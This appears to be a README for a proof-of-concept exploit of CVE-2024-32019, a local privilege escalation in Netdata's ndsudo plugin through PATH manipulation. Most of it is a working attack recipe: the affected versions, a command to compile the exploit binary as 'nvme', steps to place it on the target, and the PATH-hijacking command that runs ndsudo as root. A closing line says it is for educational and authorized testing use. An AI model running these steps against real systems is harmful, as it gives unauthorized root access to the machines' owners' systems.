
Proof-of-concept exploit for CVE-2024-32019 demonstrating local privilege escalation via untrusted search path in Netdata's ndsudo plugin. Includes compile instructions and deployment steps.
>= v1.45.0, < v1.45.3>= v1.44.0-60, < v1.45.0-169CVE-2024-32019 — ndsudo local privilege escalation via untrusted search path.
x86_64-linux-gnu-gcc -o nvme exploit.c -static
Transfer the compiled binary to the vulnerable machine.
Make it executable:
chmod +x nvme
Exploit the vulnerable binary via PATH manipulation (use the same path where you uploaded your binary):
PATH=$(pwd):$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
This Proof of Concept (PoC) code is provided for educational and authorized penetration testing purposes only.